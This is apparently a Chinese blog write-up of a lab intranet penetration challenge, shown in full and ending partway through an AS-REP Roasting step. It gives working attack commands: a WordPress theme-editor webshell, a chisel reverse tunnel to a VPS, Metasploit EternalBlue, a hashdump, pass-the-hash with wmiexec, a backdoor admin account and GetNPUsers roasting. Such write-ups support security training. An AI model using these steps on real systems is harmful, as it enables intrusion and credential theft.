<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><!-- - var tabTitle = pageTitle || config.title--><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0,viewport-fit=cover"><title>春秋云境-2022网鼎杯半决赛复现</title><meta name="author" content="symv1a"><meta name="copyright" content="symv1a"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="复现 靶标介绍：该靶场为 2022 第三届网鼎杯决赛内网靶场复盘。完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 flag，分布于不同的靶机。 考点：  wordpress插件rce MS17-010 AS-REP Roasting 基于资源的约束性委派 智">
<meta property="og:type" content="article">
<meta property="og:title" content="春秋云境-2022网鼎杯半决赛复现">
<meta property="og:url" content="https://symya.github.io/2024/10/35990125633d.html">
<meta property="og:site_name" content="symv1a&#39;s blog">
<meta property="og:description" content="复现 靶标介绍：该靶场为 2022 第三届网鼎杯决赛内网靶场复盘。完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 flag，分布于不同的靶机。 考点：  wordpress插件rce MS17-010 AS-REP Roasting 基于资源的约束性委派 智">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://symya.github.io/image/touxiang.jpg">
<meta property="article:published_time" content="2024-10-22T07:30:04.508Z">
<meta property="article:modified_time" content="2024-10-22T07:33:34.533Z">
<meta property="article:author" content="symv1a">
<meta property="article:tag" content="内网渗透">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://symya.github.io/image/touxiang.jpg"><link rel="shortcut icon" href="/image/touxiang2.jpg"><link rel="canonical" href="https://symya.github.io/2024/10/35990125633d.html"><link rel="preconnect" href="//cdn.jsdelivr.net"><link rel="preconnect" href="//hm.baidu.com"><link rel="preconnect" href="//busuanzi.ibruce.info"><link rel="stylesheet" href="/css/index.css?v=4.13.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.5.1/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0.33/dist/fancybox/fancybox.min.css" media="print" onload="this.media='all'"><script>var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?25f0a6db48baa25bd001ebe831c2d429";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script><script>const GLOBAL_CONFIG = {
  root: '/',
  algolia: {"appId":"S8U1TZP3M1","apiKey":"f255a33d4a622ffbcc75e3184d420e24","indexName":"hexo","hits":{"per_page":6},"languages":{"input_placeholder":"搜索文章","hits_empty":"找不到您查询的内容：${query}","hits_stats":"找到 ${hits} 条结果，用时 ${time} 毫秒"}},
  localSearch: undefined,
  translate: {"defaultEncoding":2,"translateDelay":0,"msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"簡"},
  noticeOutdate: {"limitDay":365,"position":"top","messagePrev":"It has been","messageNext":"days since the last update, the content of the article may be outdated."},
  highlight: {"plugin":"highlight.js","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '天',
  dateSuffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: {"limitCount":50,"languages":{"author":"作者: symv1a","link":"链接: ","source":"来源: symv1a's blog","info":"著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。"}},
  lightbox: 'fancybox',
  Snackbar: undefined,
  infinitegrid: {
    js: 'https://cdn.jsdelivr.net/npm/@egjs/infinitegrid@4.11.1/dist/infinitegrid.min.js',
    buttonText: '加载更多'
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false,
  percent: {
    toc: true,
    rightside: true,
  },
  autoDarkmode: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: '春秋云境-2022网鼎杯半决赛复现',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2024-10-22 15:33:34'
}</script><script>(win=>{
      win.saveToLocal = {
        set: (key, value, ttl) => {
          if (ttl === 0) return
          const now = Date.now()
          const expiry = now + ttl * 86400000
          const item = {
            value,
            expiry
          }
          localStorage.setItem(key, JSON.stringify(item))
        },
      
        get: key => {
          const itemStr = localStorage.getItem(key)
      
          if (!itemStr) {
            return undefined
          }
          const item = JSON.parse(itemStr)
          const now = Date.now()
      
          if (now > item.expiry) {
            localStorage.removeItem(key)
            return undefined
          }
          return item.value
        }
      }
    
      win.getScript = (url, attr = {}) => new Promise((resolve, reject) => {
        const script = document.createElement('script')
        script.src = url
        script.async = true
        script.onerror = reject
        script.onload = script.onreadystatechange = function() {
          const loadState = this.readyState
          if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
          script.onload = script.onreadystatechange = null
          resolve()
        }

        Object.keys(attr).forEach(key => {
          script.setAttribute(key, attr[key])
        })

        document.head.appendChild(script)
      })
    
      win.getCSS = (url, id = false) => new Promise((resolve, reject) => {
        const link = document.createElement('link')
        link.rel = 'stylesheet'
        link.href = url
        if (id) link.id = id
        link.onerror = reject
        link.onload = link.onreadystatechange = function() {
          const loadState = this.readyState
          if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
          link.onload = link.onreadystatechange = null
          resolve()
        }
        document.head.appendChild(link)
      })
    
      win.activateDarkMode = () => {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = () => {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
        if (t === 'dark') activateDarkMode()
        else if (t === 'light') activateLightMode()
      
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
      const detectApple = () => {
        if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
          document.documentElement.classList.add('apple')
        }
      }
      detectApple()
    })(window)</script><meta name="generator" content="Hexo 7.3.0"></head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/image/touxiang.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">9</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">15</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">4</div></a></div><hr class="custom-hr"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> Tags</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> Categories</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> Link</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> About</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('/image/zhuye.png')"><nav id="nav"><span id="blog-info"><a href="/" title="symv1a's blog"><span class="site-name">symv1a's blog</span></a></span><div id="menus"><div id="search-button"><a class="site-page social-icon search" href="javascript:void(0);"><i class="fas fa-search fa-fw"></i><span> 搜索</span></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> Tags</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> Categories</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> Link</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> About</span></a></div></div><div id="toggle-menu"><a class="site-page" href="javascript:void(0);"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">春秋云境-2022网鼎杯半决赛复现</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2024-10-22T07:30:04.508Z" title="发表于 2024-10-22 15:30:04">2024-10-22</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2024-10-22T07:33:34.533Z" title="更新于 2024-10-22 15:33:34">2024-10-22</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%AF%94%E8%B5%9B%E5%A4%8D%E7%8E%B0/">比赛复现</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">字数总计:</span><span class="word-count">3.3k</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>13分钟</span></span><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id data-flag-title="春秋云境-2022网鼎杯半决赛复现"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"><i class="fa-solid fa-spinner fa-spin"></i></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><h1 id="复现"><a href="#复现" class="headerlink" title="复现"></a>复现</h1><hr>
<p><strong>靶标介绍：</strong><br>该靶场为 2022 第三届网鼎杯决赛内网靶场复盘。完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 flag，分布于不同的靶机。</p>
<p><strong>考点：</strong></p>
<ul>
<li>wordpress插件rce</li>
<li>MS17-010</li>
<li>AS-REP Roasting</li>
<li>基于资源的约束性委派</li>
<li>智能卡身份验证出错下的CVE-2022–26923 AD域提权打法——Schannel传递证书传递到LDAPS，修改LDAP配置RBCD</li>
</ul>
<h2 id="web渗透"><a href="#web渗透" class="headerlink" title="web渗透"></a>web渗透</h2><blockquote>
<p>信息收集，外网打点</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"># python3 dirsearch.py -u 39.99.128.167 -e php</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/symya/MyPic@main/image/202410210127787.png" alt="image.png"></p>
<p>存在后台<code>/wp-admin.php</code>，弱口令<code>admin:123456</code>登录<br><img src="https://cdn.jsdelivr.net/gh/symya/MyPic@main/image/202410210115018.png" alt="image.png"><br>发现<code>theme file editor</code>功能点，可以编辑<code>php</code>文件，尝试修改该文件并提交。<br><img src="https://cdn.jsdelivr.net/gh/symya/MyPic@main/image/202410210125735.png" alt="image.png"></p>
<p>根据wordpress的命名特点找到绝对路径，发现恶意php代码被执行。<br><img src="https://cdn.jsdelivr.net/gh/symya/MyPic@main/image/202410210124945.png" alt="image.png"></p>
<blockquote>
<p>拿下一台主机</p>
</blockquote>
<p>写入一句话木马，godzilla连接，成功，在根目录下获取flag01<br><img src="https://cdn.jsdelivr.net/gh/symya/MyPic@main/image/202410210133750.png" alt="image.png"></p>
<h2 id="后渗透"><a href="#后渗透" class="headerlink" title="后渗透"></a>后渗透</h2><p>查看内网网段<br><img src="https://cdn.jsdelivr.net/gh/symya/MyPic@main/image/202410210141983.png" alt="image.png"></p>
<p>传fscan，frp，一个扫内网，一个搭隧道。</p>
<h3 id="fscan"><a href="#fscan" class="headerlink" title="fscan"></a>fscan</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wget https://github.com/shadow1ng/fscan/releases/download/1.8.2/fscan_amd64 -O fscan</span><br></pre></td></tr></table></figure>
<p>扫描结果</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line">(icmp) Target 172.22.15.13    is alive</span><br><span class="line">(icmp) Target 172.22.15.18    is alive</span><br><span class="line">(icmp) Target 172.22.15.24    is alive</span><br><span class="line">(icmp) Target 172.22.15.26    is alive</span><br><span class="line">(icmp) Target 172.22.15.35    is alive</span><br><span class="line">[*] Icmp alive hosts len is: 5</span><br><span class="line">172.22.15.13:88 open</span><br><span class="line">172.22.15.24:3306 open</span><br><span class="line">172.22.15.35:445 open</span><br><span class="line">172.22.15.24:445 open</span><br><span class="line">172.22.15.18:445 open</span><br><span class="line">172.22.15.13:445 open</span><br><span class="line">172.22.15.35:139 open</span><br><span class="line">172.22.15.24:139 open</span><br><span class="line">172.22.15.18:139 open</span><br><span class="line">172.22.15.35:135 open</span><br><span class="line">172.22.15.13:139 open</span><br><span class="line">172.22.15.13:135 open</span><br><span class="line">172.22.15.24:135 open</span><br><span class="line">172.22.15.18:135 open</span><br><span class="line">172.22.15.18:80 open</span><br><span class="line">172.22.15.24:80 open</span><br><span class="line">172.22.15.26:80 open</span><br><span class="line">172.22.15.26:22 open</span><br><span class="line">[*] alive ports len is: 18</span><br><span class="line">start vulscan</span><br><span class="line">[*] NetInfo:</span><br><span class="line">[*]172.22.15.18</span><br><span class="line">   [-&gt;]XR-CA</span><br><span class="line">   [-&gt;]172.22.15.18</span><br><span class="line">[*] NetInfo:</span><br><span class="line">[*]172.22.15.13</span><br><span class="line">   [-&gt;]XR-DC01</span><br><span class="line">   [-&gt;]172.22.15.13</span><br><span class="line">[*] NetInfo:</span><br><span class="line">[*]172.22.15.24</span><br><span class="line">   [-&gt;]XR-WIN08</span><br><span class="line">   [-&gt;]172.22.15.24</span><br><span class="line">[*] NetBios: 172.22.15.35    XIAORANG\XR-0687               </span><br><span class="line">[*] NetInfo:</span><br><span class="line">[*]172.22.15.35</span><br><span class="line">   [-&gt;]XR-0687</span><br><span class="line">   [-&gt;]172.22.15.35</span><br><span class="line">[+] 172.22.15.24	MS17-010	(Windows Server 2008 R2 Enterprise 7601 Service Pack 1)</span><br><span class="line">[*] NetBios: 172.22.15.13    [+]DC XR-DC01.xiaorang.lab          Windows Server 2016 Standard 14393 </span><br><span class="line">[*] NetBios: 172.22.15.18    XR-CA.xiaorang.lab                  Windows Server 2016 Standard 14393 </span><br><span class="line">[*] NetBios: 172.22.15.24    WORKGROUP\XR-WIN08                  Windows Server 2008 R2 Enterprise 7601 Service Pack 1 </span><br><span class="line">[*] 172.22.15.13  (Windows Server 2016 Standard 14393)</span><br><span class="line">[*] WebTitle: http://172.22.15.26       code:200 len:39962  title:XIAORANG.LAB</span><br><span class="line">[*] WebTitle: http://172.22.15.18       code:200 len:703    title:IIS Windows Server</span><br><span class="line">[*] WebTitle: http://172.22.15.24       code:302 len:0      title:None 跳转url: http://172.22.15.24/www</span><br><span class="line">[+] http://172.22.15.18 poc-yaml-active-directory-certsrv-detect </span><br><span class="line">[*] WebTitle: http://172.22.15.24/www/sys/index.php code:200 len:135    title:None</span><br></pre></td></tr></table></figure>
<ul>
<li>icmp 有5个IP地址能ping通</li>
<li>端口扫描<ul>
<li>88 通常与 Kerberos 验证协议相关</li>
<li>3306 mysql</li>
<li>445 SMB协议，用于文件共享，可能是一个Windows文件服务</li>
<li>139和135 NetBIOS 和 RPC（远程过程调用）相关的端口。windows</li>
<li>80 </li>
<li>22 ssh</li>
</ul>
</li>
<li>主机的NetBIOS和NetInfo信息（台机器的主机名和工作组）</li>
</ul>
<p>fscan的结果显然要打MS17-010,永恒之蓝</p>
<blockquote>
<p>永恒之蓝(ms17-010)过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞，恶意代码会扫描开放445文件共享端口的Windows机器，无需用户任何操作，只要开机上网，不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。</p>
</blockquote>
<p>附上一张网上的拓扑图<br><img src="https://cdn.jsdelivr.net/gh/symya/MyPic@main/image/202410220328948.png" alt="image.png"></p>
<h3 id="隧道搭建"><a href="#隧道搭建" class="headerlink" title="隧道搭建"></a>隧道搭建</h3><p>上传chisel，搭隧道</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wget https://github.com/jpillora/chisel/releases/download/v1.10.1/chisel_1.10.1_linux_amd64.gz</span><br></pre></td></tr></table></figure>
<p>VPS上,server</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./chisel server -p 1234 --reverse</span><br></pre></td></tr></table></figure>
<p>172.22.15.26 机器上,client</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./chisel client ip:1234 R:0.0.0.0:9383:socks</span><br></pre></td></tr></table></figure>

<p>然后连接vps:9383的socks5代理<br>访问 <a target="_blank" rel="external nofollow noopener noreferrer" href="http://172.22.15.24/">http://172.22.15.24/</a>  成功<br><img src="https://cdn.jsdelivr.net/gh/symya/MyPic@main/image/202410212306104.png" alt="image.png"></p>
<h3 id="MS17-010"><a href="#MS17-010" class="headerlink" title="MS17-010"></a>MS17-010</h3><p>kali，msf直接打。但是需要先在kali上也建立一下socks5访问，这样我们的脚本才能直接攻击内网服务器。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nano /etc/proxychains4.conf</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/symya/MyPic@main/image/202410212310965.png"></p>
<p>msf一把梭哈</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">proxychains4 msfconsole</span><br><span class="line">use exploit/windows/smb/ms17_010_eternalblue</span><br><span class="line">set payload windows/x64/meterpreter/bind_tcp_uuid</span><br><span class="line">set RHOSTS 172.22.15.24</span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>

<p>多打两次能成功。笔者大概跑了三回吧。</p>
<p><img src="https://cdn.jsdelivr.net/gh/symya/MyPic@main/image/202410212324951.png" alt="image.png"></p>
<p>尝试直接获取可交互的shell，回显一直是timeout，遂尝试其他方法。<br>看到其他师傅的wp直接将flag down下来，但是笔者认为无法得知flag的绝对地址，遂不使用。<br>查看当前身份</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">getuid</span><br><span class="line"># Server username: NT AUTHORITY\SYSTEM</span><br></pre></td></tr></table></figure>
<blockquote>
<p>在Windows系统中，SYSTEM用户是具有最高权限的用户账户，它拥有对系统的完全控制权。</p>
</blockquote>
<p>dump 哈希</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">hashdump</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e52d03e9b939997401466a0ec5a9cbc:::</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</span></span><br></pre></td></tr></table></figure>

<p>哈希传递，wmiexec连上去</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains4 python3 wmiexec.py administrator@172.22.15.24 -hashes :0e52d03e9b939997401466a0ec5a9cbc -codec gbk</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/symya/MyPic@main/image/202410220018209.png" alt="image.png"></p>
<p>然后就是找flag，发现直接使用这个shell找，交互时间长且容易误触，导致需要从头来过，于是打算创建一个新用户，直接rdp连接。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">net user symya 123@asd /add</span><br><span class="line">net localgroup administator symya /add</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/symya/MyPic@main/image/202410220032802.png" alt="image.png"></p>
<p>**<img src="https://cdn.jsdelivr.net/gh/symya/MyPic@main/image/202410220032350.png" alt="image.png"></p>
<h3 id="rdp连接"><a href="#rdp连接" class="headerlink" title="rdp连接"></a>rdp连接</h3><p>win+r 然后mstsc，发现无法连接，后来才发现自己只做了浏览器的socks5代理，没有做全局代理。proxfier做全局代理<br>解决方法：<a target="_blank" rel="external nofollow noopener noreferrer" href="https://blog.csdn.net/juanjuan_01/article/details/127005255">https://blog.csdn.net/juanjuan_01&#x2F;article&#x2F;details&#x2F;127005255</a></p>
<p>在机子中找到flag02</p>
<p>在该机子中存在phpstudy，发现数据库账号密码<br>在phpstudy唯一一个网站的根目录底下发现名为phpmyadmin，直接登录。发现有个表有一堆域账户。<br><img src="https://cdn.jsdelivr.net/gh/symya/MyPic@main/image/202410220325661.png" alt="image.png"></p>
<p>导出zdoosys_user.sql，改后缀改成txt然后把邮箱提取出来</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> re </span><br><span class="line"><span class="comment"># 打开原始数据文件 </span></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;zdoosys_user.txt&#x27;</span>, <span class="string">&#x27;r&#x27;</span>) <span class="keyword">as</span> file: </span><br><span class="line">	data = file.readlines() </span><br><span class="line"></span><br><span class="line"><span class="comment"># 提取指定字符串 </span></span><br><span class="line">users = [] </span><br><span class="line"><span class="keyword">for</span> line <span class="keyword">in</span> data: </span><br><span class="line">	<span class="keyword">match</span> = re.search(<span class="string">r&#x27;(\w+)@xiaorang.lab&#x27;</span>, line) </span><br><span class="line">	<span class="keyword">if</span> <span class="keyword">match</span>: </span><br><span class="line">		username = <span class="keyword">match</span>.group(<span class="number">1</span>) </span><br><span class="line">		users.append(username) </span><br><span class="line">		</span><br><span class="line"><span class="comment"># 保存提取后的字符串到 user.txt </span></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;email.txt&#x27;</span>, <span class="string">&#x27;w&#x27;</span>) <span class="keyword">as</span> file: </span><br><span class="line">	<span class="keyword">for</span> user <span class="keyword">in</span> users: </span><br><span class="line">		file.write(user + <span class="string">&#x27;\n&#x27;</span>)</span><br></pre></td></tr></table></figure>

<h3 id="弱口令接管OA"><a href="#弱口令接管OA" class="headerlink" title="弱口令接管OA"></a>弱口令接管OA</h3><p>机器为：172.22.15.24<br>代理出来后，访问，发现弱口令<code>admin:123456</code>即可登录。<br>在团队，同事列表发现大量邮箱，可以做成email字典。和上方找到的类似。<br><img src="https://cdn.jsdelivr.net/gh/symya/MyPic@main/image/202410220031050.png" alt="image.png"></p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">lixiuying@xiaorang.lab</span><br><span class="line">lixiaoliang@xiaorang.lab</span><br><span class="line">zhangyi@xiaorang.lab</span><br><span class="line">jiaxiaoliang@xiaorang.lab</span><br><span class="line">zhangli@xiaorang.lab</span><br><span class="line">zhangwei@xiaorang.lab</span><br><span class="line">liuqiang@xiaorang.lab</span><br><span class="line">wangfang@xiaorang.lab</span><br><span class="line">wangwei@xiaorang.lab</span><br><span class="line">wanglihong@xiaorang.lab</span><br><span class="line">huachunmei@xiaorang.lab</span><br><span class="line">wanghao@xiaorang.lab</span><br><span class="line">zhangxinyu@xiaorang.lab</span><br><span class="line">huzhigang@xiaorang.lab</span><br><span class="line">lihongxia@xiaorang.lab</span><br><span class="line">wangyulan@xiaorang.lab</span><br><span class="line">chenjianhua@xiaorang.lab</span><br></pre></td></tr></table></figure>

<h3 id="XR-0687AS-ERP-Roasting"><a href="#XR-0687AS-ERP-Roasting" class="headerlink" title="XR-0687AS-ERP Roasting"></a>XR-0687AS-ERP Roasting</h3><p>AS-REP Roasting攻击:  </p>
<p>Kerberos身份认证的第一个过程又被称为域身份验证，主要是为了防止与用户密码脱机爆破。如果与用户关闭了预身份验证（“Do not require Kerberos preauthentication”）的话，攻击者可以使用指定的用户向域控制器发送AS-REQ请求。然后域控制器会返回TGT票据和加密的Session-key等信息。因此攻击者就可以对获取到的加密Session-key进行离线破解，如果爆破成功，就能得到该指定用户的明文密码。这种攻击方式被称作AS-REP Roasting攻击。</p>
<p>AS-REP Roasting是一种对用户账号进行离线爆破的攻击方式。但是该攻击方式利用比较局限，因为其需要用户账号设置 “Do not require Kerberos preauthentication(不需要kerberos预身份验证) “ 。而该属性默认是没有勾选上的。<br>预身份验证是Kerberos身份验证的第一步(AS_REQ &amp; AS_REP)，它的主要作用是防止密码脱机爆破。默认情况下，预身份验证是开启的，KDC会记录密码错误次数，防止在线爆破。关于 AS_REQ &amp; AS_REP：域内认证之Kerberos协议详解。<br>当关闭了预身份验证后，攻击者可以使用指定用户去请求票据，此时域控不会作任何验证就将 TGT票据 和 该用户Hash加密的Session Key返回。因此，攻击者就可以对获取到的 用户Hash加密的Session Key进行离线破解，如果破解成功，就能得到该指定用户的密码明文。</p>
<p>AS-REP Roasting攻击条件<br>域用户设置了 “Do not require Kerberos preauthentication(不需要kerberos预身份验证)”<br>需要一台可与KDC进行通信的主机&#x2F;用户<br>进行攻击</p>
<p>跑一下，看一下是否存在有<strong>不要求Kerberos 预身份验证</strong>的账户。</p>
<p>获取TGT票据。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains4 python3 GetNPUsers.py -dc-ip 172.22.15.13 xiaorang.lab/ -usersfile /home/symya/桌面/email.txt</span><br></pre></td></tr></table></figure>

<p>得：</p>
